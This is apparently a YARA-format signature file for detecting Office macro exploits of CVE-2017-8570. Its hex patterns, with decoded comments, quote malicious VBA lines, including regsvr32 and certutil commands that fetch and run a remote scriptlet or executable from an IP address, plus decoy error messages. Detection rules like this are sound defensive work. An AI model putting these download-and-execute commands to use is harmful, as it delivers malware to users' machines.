29 lines
3.3 KiB
Plaintext
29 lines
3.3 KiB
Plaintext
|
|
rule Exploit_O97M_CVE-2017-8570_MTB{
|
|
meta:
|
|
description = "Exploit:O97M/CVE-2017-8570!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,04 00 04 00 04 00 00 01 00 "
|
|
|
|
strings :
|
|
$a_01_0 = {73 68 65 6c 6c 2e 52 75 6e 28 22 72 65 67 73 76 72 33 32 20 2f 75 20 2f 6e 20 2f 73 20 2f 69 3a 68 74 74 70 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 2f 70 61 79 6c 6f 6f 6f 61 64 2e 73 63 74 20 73 63 72 6f 62 6a 2e 64 6c 6c 22 2c 20 30 2c 20 46 61 6c 73 65 29 } //01 00 shell.Run("regsvr32 /u /n /s /i:http://127.0.0.1/payloooad.sct scrobj.dll", 0, False)
|
|
$a_01_1 = {43 61 6c 6c 20 4d 73 67 42 6f 78 28 22 48 6f 75 73 74 6f 6e 2c 20 77 65 27 76 65 20 68 61 64 20 61 20 70 72 6f 62 6c 65 6d 21 22 20 26 20 76 62 4e 65 77 4c 69 6e 65 20 26 20 22 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 70 72 6f 63 65 73 73 69 6e 67 20 65 72 72 6f 72 2e 22 } //01 00 Call MsgBox("Houston, we've had a problem!" & vbNewLine & "Microsoft Word processing error."
|
|
$a_01_2 = {22 46 61 74 61 6c 20 65 72 72 6f 72 21 22 29 } //01 00 "Fatal error!")
|
|
$a_01_3 = {44 69 6d 20 73 68 65 6c 6c } //00 00 Dim shell
|
|
condition:
|
|
any of ($a_*)
|
|
|
|
}
|
|
rule Exploit_O97M_CVE-2017-8570_MTB_2{
|
|
meta:
|
|
description = "Exploit:O97M/CVE-2017-8570!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,07 00 07 00 06 00 00 04 00 "
|
|
|
|
strings :
|
|
$a_01_0 = {2f 75 20 2f 6e 20 2f 73 20 2f 69 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 2e 73 63 74 20 73 63 72 6f 62 6a 2e 64 6c 6c 22 2c 20 30 2c 20 46 61 6c 73 65 29 } //04 00 /u /n /s /i:http://185.104.114.115/1.sct scrobj.dll", 0, False)
|
|
$a_01_1 = {2e 52 75 6e 20 28 22 63 6d 64 2e 65 78 65 20 2f 63 20 63 65 72 74 75 74 69 6c 2e 65 78 65 20 2d 75 72 6c 63 61 63 68 65 20 2d 73 70 6c 69 74 20 2d 66 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 32 33 2e 65 78 65 20 73 64 66 73 64 66 2e 65 78 65 20 26 26 20 73 74 61 72 74 20 73 64 66 73 64 66 2e 65 78 65 22 29 } //04 00 .Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")
|
|
$a_01_2 = {2e 52 75 6e 20 28 22 63 6d 64 2e 65 78 65 20 2f 63 20 63 65 72 22 20 2b 20 22 74 75 74 69 6c 2e 65 78 65 20 2d 75 72 6c 22 20 2b 20 22 63 61 63 68 65 20 2d 73 70 22 20 2b 20 22 6c 69 74 20 2d 66 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 32 33 2e 65 78 65 20 73 64 66 73 64 66 2e 65 78 65 20 26 26 20 73 74 61 72 74 } //01 00 .Run ("cmd.exe /c cer" + "tutil.exe -url" + "cache -sp" + "lit -f http://185.104.114.115/123.exe sdfsdf.exe && start
|
|
$a_01_3 = {53 65 74 20 6f 52 65 67 20 3d 20 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 7b 69 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 4c 65 76 65 6c 3d 69 6d 70 65 72 73 6f 6e 61 74 65 7d 21 5c 5c 2e 5c 72 6f 22 20 2b 20 22 6f 74 5c 64 65 66 61 75 6c 74 3a 22 20 2b 20 22 53 74 64 52 65 67 50 72 6f 76 22 29 } //01 00 Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv")
|
|
$a_01_4 = {6d 73 67 20 3d 20 22 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 61 70 70 65 61 72 73 20 74 6f 20 62 65 20 6d 61 64 65 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 66 6f 72 6d 61 74 2e 20 5b 45 72 72 6f 72 20 43 6f 64 65 3a 20 2d 32 32 39 5d } //01 00 msg = "This application appears to be made not supported format. [Error Code: -229]
|
|
$a_01_5 = {44 69 6d 20 73 68 65 61 73 64 6c 6c } //00 00 Dim sheasdll
|
|
condition:
|
|
any of ($a_*)
|
|
|
|
} |